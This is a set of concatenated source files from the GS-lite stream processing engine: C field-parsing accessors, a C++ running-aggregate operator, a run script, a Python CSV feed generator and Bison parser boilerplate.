case 17: value += (str[len-17] - '0') * 10000000000000000UL;
case 16: value += (str[len-16] - '0') * 1000000000000000UL;
case 15: value += (str[len-15] - '0') * 100000000000000UL;
case 14: value += (str[len-14] - '0') * 10000000000000UL;
case 13: value += (str[len-13] - '0') * 1000000000000UL;
case 12: value += (str[len-12] - '0') * 100000000000UL;
case 11: value += (str[len-11] - '0') * 10000000000UL;
case 10: value += (str[len-10] - '0') * 1000000000UL;
case 9: value += (str[len- 9] - '0') * 100000000UL;
case 8: value += (str[len- 8] - '0') * 10000000UL;
case 7: value += (str[len- 7] - '0') * 1000000UL;
case 6: value += (str[len- 6] - '0') * 100000UL;
case 5: value += (str[len- 5] - '0') * 10000UL;
case 4: value += (str[len- 4] - '0') * 1000UL;
case 3: value += (str[len- 3] - '0') * 100UL;
case 2: value += (str[len- 2] - '0') * 10UL;
case 1: value += (str[len- 1] - '0');
return value;
default:
return 0;
}
}
static inline __attribute__((always_inline)) long gs_strtol (const char *str, size_t len) {
long sign = 1;
if (str[0] == '-') {
sign = -1;
++str;
--len;
}
return sign * gs_strtoul(str, len);
}
static inline __attribute__((always_inline)) long gs_strtoll (const char *str, size_t len) {
long long sign = 1;
if (str[0] == '-') {
sign = -1;
++str;
--len;
}
return sign * gs_strtoull(str, len);
}
/* CSV access function using position as 3rd argument */
static inline gs_retval_t get_csv_float_to_timestamp(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
// *t = strtoul((const char*)p->record.csv.fields[pos-1], NULL, 10);
*t = gs_strtoul((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]<10 ? p->record.csv.field_lens[pos-1] : 10);
return 0;
}
static inline gs_retval_t get_csv_uint(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
// *t = strtoul((const char*)p->record.csv.fields[pos-1], NULL, 10);
*t = gs_strtoul((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
return 0;
}
static inline gs_retval_t get_csv_ullong(struct packet * p, gs_uint64_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
// *t = strtoull((const char*)p->record.csv.fields[pos-1], NULL, 10);
*t = gs_strtoull((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
return 0;
}
static inline gs_retval_t get_csv_ip(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
// parsed data is not NULL temrinated, we can terminate it to be able to use standard C functions
// exception is the last field than needs to be copied
gs_int8_t buffer[256];
gs_sp_t data=(gs_sp_t)p->record.csv.fields[pos-1];
gs_uint32_t data_len = p->record.csv.field_lens[pos-1];
if (pos == p->record.csv.numberfields) {
memcpy(buffer, data, data_len);
data = buffer;
}
data[data_len] = '\0';
unsigned ip1,ip2,ip3,ip4;
sscanf((const char*)data,"%u.%u.%u.%u",&ip1,&ip2,&ip3,&ip4);
*t=(ip1<<24)|(ip2<<16)|(ip3<<8)|ip4;
return 0;
}
static inline gs_retval_t get_csv_ipv6(struct packet * p, struct ipv6_str * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
// parsed data is not NULL temrinated, we can terminate it to be able to use standard C functions
// exception is the last field than needs to be copied before we can terminate it
gs_int8_t buffer[256];
gs_sp_t data=(gs_sp_t)p->record.csv.fields[pos-1];
gs_uint32_t data_len = p->record.csv.field_lens[pos-1];
if (pos == p->record.csv.numberfields) {
memcpy(buffer, data, data_len);
data = buffer;
}
data[data_len] = '\0';
gs_uint32_t v[8];
sscanf((const char*)data,"%x:%x:%x:%x:%x:%x:%x:%x",&v[0],&v[1],&v[2],&v[3],&v[4],&v[5],&v[6],&v[7]);
t->v[0]=htonl(v[0]<<16|v[1]);
t->v[1]=htonl(v[2]<<16|v[3]);
t->v[2]=htonl(v[4]<<16|v[5]);
t->v[3]=htonl(v[6]<<16|v[7]);
return 0;
}
static inline gs_retval_t get_csv_string(struct packet * p, struct gs_string * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
t->data=(gs_sp_t)p->record.csv.fields[pos-1];
t->length=p->record.csv.field_lens[pos-1];
t->owner=0;
return 0;
}
static inline gs_retval_t get_csv_bool(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
*t=0;
if ((p->record.csv.field_lens[pos-1]==4) &&
(strncasecmp("TRUE",(const char*)p->record.csv.fields[pos-1],4) ==0) ) {
*t=1;
}
return 0;
}
static inline gs_retval_t get_csv_int(struct packet * p, gs_int32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
//*t = strtol((const char*)p->record.csv.fields[pos-1], NULL, 10);
*t = gs_strtol((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
return 0;
}
static inline gs_retval_t get_csv_llong(struct packet * p, gs_int64_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
//*t = strtoll((const char*)p->record.csv.fields[pos-1], NULL, 10);
*t = gs_strtoll((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
return 0;
}
static inline gs_retval_t get_csv_float(struct packet * p, gs_float_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
if (p->ptype != PTYPE_CSV) return -1;
if (p->record.csv.numberfields < pos) return -1;
#endif
// parsed data is not NULL temrinated, we can terminate it to be able to use standard C functions
// exception is the last field than needs to be copied before we can terminate it
gs_int8_t buffer[256];
gs_sp_t data=(gs_sp_t)p->record.csv.fields[pos-1];
gs_uint32_t data_len = p->record.csv.field_lens[pos-1];
if (pos == p->record.csv.numberfields) {
memcpy(buffer, data, data_len);
data = buffer;
}
data[data_len] = '\0';
*t = strtod((const char*)data, NULL);
return 0;
}
#include <lfta/csv_macro.h>
/* GDAT access function using position as 3rd argument */
//#define GDATDEBUG
static inline gs_retval_t get_gdat_uint(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
struct access_result ar;
#ifdef GDATDEBUG
fprintf(stderr,"Decode uint");
#endif
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=UINT_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
*t=ar.r.ui;
return 0;
}
static inline gs_retval_t get_gdat_ullong(struct packet * p, gs_uint64_t * t,gs_uint32_t pos)
{
struct access_result ar;
#ifdef GDATDEBUG
fprintf(stderr,"Decode ullong");
#endif
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=ULLONG_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
*t=ar.r.ul;
return 0;
}
static inline gs_retval_t get_gdat_ip(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
struct access_result ar;
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"Decode ip");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=IP_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
*t=ar.r.ui;
return 0;
}
static inline gs_retval_t get_gdat_ipv6(struct packet * p, struct ipv6_str * t,gs_uint32_t pos)
{
struct access_result ar;
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"Decode ipv6");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=IPV6_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
t->v[0]=ar.r.ip6.v[0];
t->v[1]=ar.r.ip6.v[1];
t->v[2]=ar.r.ip6.v[2];
t->v[3]=ar.r.ip6.v[3];
return 0;
}
static inline gs_retval_t get_gdat_string(struct packet * p, struct gs_string * t,gs_uint32_t pos)
{
struct access_result ar;
#ifdef GDATDEBUG
fprintf(stderr,"Decode string");
#endif
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=VSTR_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
t->data=(gs_sp_t)ar.r.vs.offset;
t->length=ar.r.vs.length;
return 0;
}
static inline gs_retval_t get_gdat_bool(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
struct access_result ar;
#ifdef GDATDEBUG
fprintf(stderr,"Decode bool");
#endif
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=BOOL_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
*t=ar.r.ui;
return 0;
}
static inline gs_retval_t get_gdat_int(struct packet * p, gs_int32_t * t,gs_uint32_t pos)
{
struct access_result ar;
#ifdef GDATDEBUG
fprintf(stderr,"Decode int");
#endif
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=INT_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
*t=ar.r.i;
return 0;
}
static inline gs_retval_t get_gdat_llong(struct packet * p, gs_int64_t * t,gs_uint32_t pos)
{
struct access_result ar;
#ifdef GDATDEBUG
fprintf(stderr,"Decode llong");
#endif
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=LLONG_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
*t=ar.r.l;
return 0;
}
static inline gs_retval_t get_gdat_float(struct packet * p, gs_float_t * t,gs_uint32_t pos)
{
struct access_result ar;
#ifdef GDATDEBUG
fprintf(stderr,"Decode float");
#endif
if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
fprintf(stderr,".");
#endif
if (ar.field_data_type!=FLOAT_TYPE) return -1;
#ifdef GDATDEBUG
fprintf(stderr,"DONE\n");
#endif
*t=ar.r.f;
return 0;
}
#include <lfta/gdat_macro.h>
// External functions
#ifdef __cplusplus
}
#endif
#endif
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef GSOPTIONS
#define GSOPTIONS
// Controls which optional capabilities will be built into runtime
// support for interfaces with google protobuf streams
#define PROTO_ENABLED
// support BSA stream interfaces
//#define BSA_ENABLED
// support for KAFKA interfaces
//#define KAFKA_ENABLED
// support for SSL decryption
//#define SSL_ENABLED
// support RMR streams
#define RMR_ENABLED
#endif
<file_sep>#!/bin/sh
./killexample
sleep 1
./runit
sleep 10
python ./gen_feed.py &
../../bin/gsprintconsole `cat gshub.log` default example &
sleep 10
../../bin/start_processing
<file_sep>import random
import time
ipv4s = ["1.2.3.4", "3.4.5.6", "172.16.17.32", "192.168.127.12"]
ipv6s = ["fc00:db20:35b:7399::5",
"fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
"fdf8:f53e:61e4::18",
"fc00:db20:35b:7399::5" ]
strings = ["foo", "bar", "zed", "flip", "flood"]
bools = ["TRUE", "FALSE"]
tstart = int(time.time())
tend = tstart+50
rec_per_ts = 5
for ts in xrange(tstart, tend+1):
for rno in xrange(0, rec_per_ts):
v2 = str(random.randint(1,100000))
v3 = ipv4s[random.randrange(0,len(ipv4s))]
v4 = ipv6s[random.randrange(0,len(ipv6s))]
v5 = strings[random.randrange(0,len(strings))]
v6 = bools[random.randrange(0,len(bools))]
v7 = str(random.randint(1,100000))
v8 = str(random.randint(1,100000))
v9 = str(random.uniform(1,100000))
rec = [str(ts), v2, v3, v4, v5, v6, v7, v8, v9]
print ",".join(rec)
<file_sep>.. This work is licensed under a Creative Commons Attribution 4.0 International License.
.. SPDX-License-Identifier: CC-BY-4.0
GS-lite Stream Processing Engine Overview
==========================================
GS-lite an open-source, real-time, low-latency, high-throughput stream processing engine.
It is a fork of cask/tigon (https://github.com/cdapio/tigon) maintained to serve the needs of RIC applications (currently MC xApp).
The original github repository is no longer maintained by the original maintainers.
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef RWGROUPBY_OPERATOR_H
#define RWGROUPBY_OPERATOR_H
#include "host_tuple.h"
#include "base_operator.h"
#include <list>
#include "hash_table.h"
#define _GB_FLUSH_PER_TUPLE_ 1
using namespace std;
template <class groupby_func, class group, class aggregate, class hasher_func, class equal_func>
class running_agg_operator : public base_operator {
private :
groupby_func func;
hash_table<group, aggregate, hasher_func, equal_func> group_table;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator flush_pos;
gs_int32_t nflushes;
public:
running_agg_operator(int schema_handle, const char* name) : base_operator(name), func(schema_handle) {
flush_pos = group_table.end();
}
virtual int accept_tuple(host_tuple& tup, list<host_tuple>& result) {
// Push out completed groups
group grp, *ret;
ret = func.create_group(tup, (gs_sp_t)&grp);
nflushes = func.flush_needed();
if(func.disordered()){
// fprintf(stderr,"Out of order record in %s\n",op_name);
return 0;
}
if (! ret) {
if (nflushes>0){
flush(result);
}
if (func.temp_status_received()) {
host_tuple temp_tup;
if (!func.create_temp_status_tuple(temp_tup, true)) {
temp_tup.channel = output_channel;
result.push_back(temp_tup);
}
}
tup.free_tuple();
return 0;
}
if (nflushes>0) {
flush(result);
}
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
if ((iter = group_table.find(grp)) != group_table.end()) {
func.update_aggregate(tup, grp, (*iter).second);
}else{
char aggr_buffer[sizeof(aggregate)];
// create an aggregate in preallocated buffer
func.create_aggregate(tup, aggr_buffer);
// neeed operator= doing a deep copy
group_table.insert(grp, (*(aggregate*)aggr_buffer));
}
tup.free_tuple();
return 0;
}
virtual int flush(list<host_tuple>& result) {
host_tuple tup;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
// Limit the number of successive flushes - avoid explosive behavior
const gs_int32_t max_flushes = 25;
if(nflushes>max_flushes){
fprintf(stderr,"Warning in operator %s, temporal advance of %d windows needed, max number of windows that can be reported at once is %d\n",op_name, nflushes, max_flushes);
nflushes = max_flushes;
}
for(gs_int32_t flush_no = 0; flush_no < nflushes; ++flush_no){
// advance the TB for the reinit
if(flush_no < nflushes-1){
func.advance_last_tb();
}else{
func.reset_last_tb(); // Move to current tb in case flush limit reached
}
// If the old table isn't empty, flush it now.
for (flush_pos = group_table.begin(); flush_pos != group_table.end(); ) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
if(func.cleaning_when((*flush_pos).first,(*flush_pos).second)){
group &g = (*flush_pos).first;
//aggregate a = (*flush_pos).second;
++flush_pos;
group_table.erase(g);
}else{
func.reinit_aggregates((*flush_pos).first, (*flush_pos).second);
++flush_pos;
}
}
}
return 0;
}
virtual int set_param_block(int sz, void * value) {
func.set_param_block(sz, value);
return 0;
}
virtual int get_temp_status(host_tuple& result) {
result.channel = output_channel;
return func.create_temp_status_tuple(result, true);
}
virtual int get_blocked_status () {
return -1;
}
unsigned int get_mem_footprint() {
return group_table.get_mem_footprint();
}
};
#endif // GROUPBY_OPERATOR_H
<file_sep>/* A Bison parser, made by GNU Bison 3.0.4. */
/* Bison implementation for Yacc-like parsers in C
Copyright (C) 1984, 1989-1990, 2000-2015 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>. */
/* As a special exception, you may create a larger work that contains
part or all of the Bison parser skeleton and distribute that work
under terms of your choice, so long as that work isn't itself a
parser generator using the skeleton or a modified version thereof
as a parser skeleton. Alternatively, if you modify or redistribute
the parser skeleton itself, you may (at your option) remove this
special exception, which will cause the skeleton and the resulting
Bison output files to be licensed under the GNU General Public
License without this special exception.
This special exception was added by the Free Software Foundation in
version 2.2 of Bison. */
/* C LALR(1) parser skeleton written by <NAME>, by
simplifying the original so-called "semantic" parser. */
/* All symbols defined below should begin with yy or YY, to avoid
infringing on user name space. This should be done even for local
variables, as they might otherwise be expanded by user macros.
There are some unavoidable exceptions within include files to
define necessary library symbols; they are noted "INFRINGES ON
USER NAME SPACE" below. */
/* Identify Bison output. */
#define YYBISON 1
/* Bison version. */
#define YYBISON_VERSION "3.0.4"
/* Skeleton name. */
#define YYSKELETON_NAME "yacc.c"
/* Pure parsers. */
#define YYPURE 0
/* Push parsers. */
#define YYPUSH 0
/* Pull parsers. */
#define YYPULL 1
/* Substitute the variable and function names. */
#define yyparse FtaParserparse
#define yylex FtaParserlex
#define yyerror FtaParsererror
#define yydebug FtaParserdebug
#define yynerrs FtaParsernerrs
#define yylval FtaParserlval
#define yychar FtaParserchar
/* Copy the first part of user declarations. */
#line 23 "fta.y" /* yacc.c:339 */
#include <stdio.h>
/* Some addn'l includes, necessary but not included by the
bison generated code.
*/
#include <stdlib.h>
/* prototypes for the parser callbacks.
*/
#include "parse_fta.h"
#include "parse_schema.h"
extern fta_parse_t *fta_parse_result;
extern var_defs_t *fta_parse_defines;
#define YYDEBUG 1
#line 100 "fta.tab.cc" /* yacc.c:339 */
# ifndef YY_NULLPTR
# if defined __cplusplus && 201103L <= __cplusplus
# define YY_NULLPTR nullptr
# else
# define YY_NULLPTR 0
# endif
# endif
/* Enabling verbose error messages. */
#ifdef YYERROR_VERBOSE
# undef YYERROR_VERBOSE
# define YYERROR_VERBOSE 1
#else
# define YYERROR_VERBOSE 0
#endif
/* In a future release of Bison, this section will be replaced
by #include "fta.tab.cc.h". */
#ifndef YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
# define YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
/* Debug traces. */
#ifndef YYDEBUG
# define YYDEBUG 0
#endif
#if YYDEBUG
extern int FtaParserdebug;
#endif
/* Token type. */
#ifndef YYTOKENTYPE
# define YYTOKENTYPE
enum yytokentype
{
NAME = 258,
STRING_TOKEN = 259,
INTNUM = 260,
LONGINTNUM = 261,
APPROXNUM = 262,
OR = 263,
AND = 264,
NOT = 265,
COMPARISON = 266,
SHIFT_OP = 267,
UMINUS = 268,
SEMICOLON = 269,
LEFTBRACE = 270,
RIGHTBRACE = 271,
BY = 272,
AS = 273,
AGGR = 274,
FROM = 275,
INNER_JOIN = 276,
FILTER_JOIN = 277,
OUTER_JOIN = 278,
LEFT_OUTER_JOIN = 279,
RIGHT_OUTER_JOIN = 280,
WATCHLIST_JOIN = 281,
GROUP = 282,
HAVING = 283,
IN = 284,
SELECT = 285,
WATCHLIST = 286,
WHERE = 287,
SUPERGROUP = 288,
CLEANING_WHEN = 289,
CLEANING_BY = 290,
CLOSING_WHEN = 291,
SUCH = 292,
THAT = 293,
CUBE = 294,
ROLLUP = 295,
GROUPING_SETS = 296,
TRUE_V = 297,
FALSE_V = 298,
TIMEVAL_L = 299,
HEX_L = 300,
LHEX_L = 301,
IP_L = 302,
IPV6_L = 303,
MERGE = 304,
SLACK = 305,
DEFINE_SEC = 306,
PARAM_SEC = 307,
PROTOCOL = 308,
TABLE = 309,
STREAM = 310,
FTA = 311,
UNPACK_FCNS = 312,
OPERATOR = 313,
OPERATOR_VIEW = 314,
FIELDS = 315,
SUBQUERIES = 316,
SELECTION_PUSHDOWN = 317
};
#endif
/* Value type. */
#if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
union YYSTYPE
{
#line 52 "fta.y" /* yacc.c:355 */
int intval;
double floatval;
char *strval;
int subtok;
string_t *stringval;
/* for FTA definition. */
literal_t *litval;
scalarexp_t *scalarval;
se_list_t *se_listval;
select_list_t *select_listval;
table_exp_t *tblp;
predicate_t *predp;
literal_list_t *lit_l;
tablevar_t *table;
tablevar_list_t *tbl_list;
colref_t *colref;
ifpref_t *ifpref;
colref_list_t *clist;
var_defs_t *var_defs;
var_pair_t *var_pair;
gb_t *gb_val;
gb_list_t *gb_list;
list_of_gb_list_t *list_of_gb_list;
extended_gb_t *extended_gb;
extended_gb_list_t *extended_gb_list;
query_list_t *q_list;
/* For table definition */
field_entry *field_t;
field_entry_list *field_list_t;
table_def *table_def_t;
table_list *table_list_schema;
param_list *plist_t;
name_vec *namevec_t;
subquery_spec *subq_spec_t;
subqueryspec_list *subqueryspec_list_t;
unpack_fcn *ufcn;
unpack_fcn_list *ufcnl;
#line 248 "fta.tab.cc" /* yacc.c:355 */
};
typedef union YYSTYPE YYSTYPE;
# define YYSTYPE_IS_TRIVIAL 1
# define YYSTYPE_IS_DECLARED 1
#endif
extern YYSTYPE FtaParserlval;
int FtaParserparse (void);
#endif /* !YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED */
/* Copy the second part of user declarations. */
#line 265 "fta.tab.cc" /* yacc.c:358 */
#ifdef short
# undef short
#endif
#ifdef YYTYPE_UINT8
typedef YYTYPE_UINT8 yytype_uint8;
#else
typedef unsigned char yytype_uint8;
#endif
#ifdef YYTYPE_INT8
typedef YYTYPE_INT8 yytype_int8;
#else
typedef signed char yytype_int8;
#endif
#ifdef YYTYPE_UINT16
typedef YYTYPE_UINT16 yytype_uint16;
#else
typedef unsigned short int yytype_uint16;
#endif
#ifdef YYTYPE_INT16
typedef YYTYPE_INT16 yytype_int16;
#else
typedef short int yytype_int16;
#endif
#ifndef YYSIZE_T
# ifdef __SIZE_TYPE__
# define YYSIZE_T __SIZE_TYPE__
# elif defined size_t
# define YYSIZE_T size_t
# elif ! defined YYSIZE_T
# include <stddef.h> /* INFRINGES ON USER NAME SPACE */
# define YYSIZE_T size_t
# else
# define YYSIZE_T unsigned int
# endif
#endif
#define YYSIZE_MAXIMUM ((YYSIZE_T) -1)
#ifndef YY_
# if defined YYENABLE_NLS && YYENABLE_NLS
# if ENABLE_NLS
# include <libintl.h> /* INFRINGES ON USER NAME SPACE */
# define YY_(Msgid) dgettext ("bison-runtime", Msgid)
# endif
# endif
# ifndef YY_
# define YY_(Msgid) Msgid
# endif
#endif
#ifndef YY_ATTRIBUTE
# if (defined __GNUC__ \
&& (2 < __GNUC__ || (__GNUC__ == 2 && 96 <= __GNUC_MINOR__))) \
|| defined __SUNPRO_C && 0x5110 <= __SUNPRO_C
# define YY_ATTRIBUTE(Spec) __attribute__(Spec)
# else
# define YY_ATTRIBUTE(Spec) /* empty */
# endif
#endif
#ifndef YY_ATTRIBUTE_PURE
# define YY_ATTRIBUTE_PURE YY_ATTRIBUTE ((__pure__))
#endif
#ifndef YY_ATTRIBUTE_UNUSED
# define YY_ATTRIBUTE_UNUSED YY_ATTRIBUTE ((__unused__))
#endif
#if !defined _Noreturn \
&& (!defined __STDC_VERSION__ || __STDC_VERSION__ < 201112)
# if defined _MSC_VER && 1200 <= _MSC_VER
# define _Noreturn __declspec (noreturn)
# else
# define _Noreturn YY_ATTRIBUTE ((__noreturn__))
# endif
#endif
/* Suppress unused-variable warnings by "using" E. */
#if ! defined lint || defined __GNUC__
# define YYUSE(E) ((void) (E))
#else
# define YYUSE(E) /* empty */
#endif
#if defined __GNUC__ && 407 <= __GNUC__ * 100 + __GNUC_MINOR__
/* Suppress an incorrect diagnostic about yylval being uninitialized. */
# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN \
_Pragma ("GCC diagnostic push") \
_Pragma ("GCC diagnostic ignored \"-Wuninitialized\"")\
_Pragma ("GCC diagnostic ignored \"-Wmaybe-uninitialized\"")
# define YY_IGNORE_MAYBE_UNINITIALIZED_END \
_Pragma ("GCC diagnostic pop")
#else
# define YY_INITIAL_VALUE(Value) Value
#endif
#ifndef YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
# define YY_IGNORE_MAYBE_UNINITIALIZED_END
#endif
#ifndef YY_INITIAL_VALUE
# define YY_INITIAL_VALUE(Value) /* Nothing. */
#endif
#if ! defined yyoverflow || YYERROR_VERBOSE
/* The parser invokes alloca or malloc; define the necessary symbols. */
# ifdef YYSTACK_USE_ALLOCA
# if YYSTACK_USE_ALLOCA
# ifdef __GNUC__
# define YYSTACK_ALLOC __builtin_alloca
# elif defined __BUILTIN_VA_ARG_INCR
# include <alloca.h> /* INFRINGES ON USER NAME SPACE */
# elif defined _AIX
# define YYSTACK_ALLOC __alloca
# elif defined _MSC_VER
# include <malloc.h> /* INFRINGES ON USER NAME SPACE */
# define alloca _alloca
# else
# define YYSTACK_ALLOC alloca
# if ! defined _ALLOCA_H && ! defined EXIT_SUCCESS
# include <stdlib.h> /* INFRINGES ON USER NAME SPACE */
/* Use EXIT_SUCCESS as a witness for stdlib.h. */
# ifndef EXIT_SUCCESS
# define EXIT_SUCCESS 0
# endif
# endif
# endif
# endif
# endif
# ifdef YYSTACK_ALLOC
/* Pacify GCC's 'empty if-body' warning. */
# define YYSTACK_FREE(Ptr) do { /* empty */; } while (0)
# ifndef YYSTACK_ALLOC_MAXIMUM
/* The OS might guarantee only one guard page at the bottom of the stack,
and a page size can be as small as 4096 bytes. So we cannot safely
invoke alloca (N) if N exceeds 4096. Use a slightly smaller number
to allow for a few compiler-allocated temporary stack slots. */
# define YYSTACK_ALLOC_MAXIMUM 4032 /* reasonable circa 2006 */
# endif
# else
# define YYSTACK_ALLOC YYMALLOC
# define YYSTACK_FREE YYFREE
# ifndef YYSTACK_ALLOC_MAXIMUM
